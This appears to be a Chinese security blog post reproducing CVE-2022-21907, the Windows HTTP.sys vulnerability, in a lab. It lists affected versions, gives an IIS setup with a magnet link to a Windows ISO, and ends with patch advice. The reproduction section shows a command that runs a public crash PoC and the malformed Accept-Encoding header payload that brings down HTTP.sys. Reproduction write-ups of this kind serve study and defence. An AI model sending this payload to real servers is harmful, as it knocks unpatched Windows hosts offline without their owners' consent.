CVE-2022-21907 Microsoft Windows HTTP 协议栈远程代码执行漏洞复现
目录
0x01 声明:
0x02 简介:
0x03 漏洞概述:
0x04 影响版本:
0x05 环境搭建:
下载:
开启IIS:
0x06 漏洞复现:
利用POC:
0x07 流量分析:
客户端:
0x08 修复建议:
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Microsoft Windows HTTP 协议栈(HTTP.sys)是Windows操作系统中处理HTTP请求的内核驱动程序,常见于Web浏览器与 Web 服务器之间的通信,,以及Internet Information Services (IIS)中。
由于该漏洞危害极大且影响范围甚广,而目前官方已发布修复补丁,建议广大用户及时更新补丁,并且做好资产自查以及预防工作,以免遭受黑客攻击。
0x03 漏洞概述:
Microsoft Windows HTTP 协议栈远程代码执行漏洞,漏洞编号为CVE-2022-21907,漏洞等级:严重,漏洞评分:9.8。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞。
0x04 影响版本:
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
0x05 环境搭建:
下载:
文件名:cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso
BT链接:
magnet:?xt=urn:btih:38A3327AC2E4D57BA0E3ECC421588FA6B352C967&dn=cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso&xl=5424910336
开启IIS:
打开控制面板—启用关闭Windows功能—开启lnternet Information Services& Internet lnformation Services可承载的Web核心
0x06 漏洞复现:
利用POC:
(https://github.com/p0dalirius/CVE-2022-21907-http.sys)
Python CVE-2022-21907_http.sys_crash.py -t 192.168.16.132
0x07 流量分析:
客户端:
请求Accept-Encoding:
AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,
0x08 修复建议:
微软官方目前已修复该漏洞,并发布了相关安全补丁,建议用户尽快安装补丁。
下载链接:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907
CVE-2022-21907 Microsoft Windows HTTP 协议栈远程代码执行漏洞复现相关推荐
- 服务器2008操作系统漏洞,【操作系统安全漏洞 】解决CVE-2017-11780:Microsoft Windows SMB Server远程代码执行漏洞...
一.漏洞描述 2017年10月10日,微软漏洞补丁日修复了多个安全漏洞,其中一个为Microsoft WindowsSMB Server远程执行代码漏洞,根据官方描述该漏洞如果被成功利用,远程攻击者可 ...
- CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
文章目录 免责声明 前言 一.漏洞简介 风险等级评判 二.影响版本 office版本 三.漏洞复现 复现环境 工具 使用方法 利用 第一种 第二种 防范避免 结尾 参考 免责声明 本文章仅供学习和研究 ...
- CVE-2020-16838 Windows tcp/ip 远程代码执行漏洞复现
漏洞环境 攻击机:windows 10 (python版本:3.7 ,安装了scapy依赖) 受害机环境:windows10 1909 受害机网络开启ipv6支持 打开cmd输入ipconfig查看受 ...
- 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)
漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...
- windows server 2012 远程连不上_CVE20201350 | Windows DNS Server远程代码执行漏洞通告
0x00 漏洞概述 CVE ID CVE-2020-1350 时 间 2020-07-15 类 型 RCE 等 级 严重 远程利用 是 影响范围 0x01 漏洞详情 微软于 ...
- CVE-2021-1675: Windows Print Spooler远程代码执行漏洞
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...
- [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- Windows Print Spooler 远程代码执行漏洞(CVE-2021-1675)
点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中. 微软在2021年6月的安全更 ...
- rmi远程代码执行漏洞_微软 Windows DNS Server 远程代码执行漏洞
安全预警 漏洞:微软 Windows DNS Server 远程代码执行漏洞漏洞编号:CVE-2020-1350威胁程度:高影响范围: Windows Server 2008 for 32-bit S ...
最新文章
- 服务器虚拟机怎么控制,虚拟机可以控制云服务器吗
- 没学过python、但是还是有公司要-想转行,是要入坑Python还是Java?这问题还用问?...
- 使用opencv和python进行智能图像处理_使用OpenCV在Python中进行图像处理
- 带分页功能的SSH整合,DAO层经典封装
- sql server死锁_了解SQL Server死锁图的图形表示
- MacPE+WinPE-黑苹果之路
- Flowable官方指定中国社区成立了
- 《模拟电子技术》–童诗白
- 在虚幻引擎5中构建你的首款游戏 - 03 - 模型和材质蓝图
- 工业4.0时代,企业如何提升设备管理效率?
- 入门OJ 3168【等式】
- virtualbox 清理磁盘占用空间
- PT站的分享精神,我所向往的PT分享模式(原创)
- Gossiping --解题报告
- 日本研发5nm取得重大进展,和美国远离EUV,ASML陷入众叛亲离境地
- 20191219 门面设计模式
- ISD1700系列语音芯片使用注意事项
- 华为服务器主板芯片组,华为鲲鹏服务器主板正式发布!打造最强算力 世界最强!...
- python 数据挖掘 培训视频下利用Pandas进行数据清洗
- Magisk搞机器记录(小米Mix3)
热门文章
- OSChina 周四乱弹 —— 如果你追到我,我就和你……
- I-P-B frame简介
- 最佳情侣身高差 (10 分)
- 一分钟实现生成自定义的连续时间格式字符
- 计算机如何修改任务管理器,win7如何更改任务管理器快捷键_win7更改任务管理器快捷键的教程...
- 聚类评价指标(轮廓系数 Silhouette coefficient)
- UE4蓝图流程控制:FlipFlop节点、DoOnce节点的使用
- vue搜索关键字标红
- css中outline,css中outline的解析(附示例)
- 华硕x550JK,i5改进